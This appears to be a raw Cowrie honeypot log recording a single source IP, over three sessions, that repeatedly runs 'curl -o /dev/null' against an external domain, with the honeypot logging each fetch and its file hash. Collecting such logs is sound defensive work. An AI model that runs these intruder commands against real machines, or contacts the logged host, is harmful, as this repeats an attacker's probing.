{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.604043Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.673173Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.674409Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.675090Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.678264Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.679578Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.680111Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.682868Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.684423Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.685344Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.688854Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.692034Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.727478Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.729405Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.730967Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.731455Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.734130Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.734637Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.737276Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.737819Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.769931Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.772067Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.774038Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.775124Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.775996Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.779305Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.781016Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.782512Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.792392Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.793141Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.818182Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.819318Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.819810Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.821856Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.822708Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.823298Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.849975Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.851948Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.852892Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.859090Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.860123Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.862680Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.863651Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.868381Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.893622Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.896016Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.898379Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.901542Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.902482Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.903048Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.905028Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.905630Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.915981Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.916651Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.947015Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.949257Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.950641Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.951195Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.953230Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.954100Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.957477Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.958694Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.959191Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:50.994560Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.995393Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:50.998076Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.005267Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.009489Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.010350Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.012082Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.012691Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.043314Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.044769Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.045654Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.077768Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.082833Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.085494Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.086166Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.087981Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.088696Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
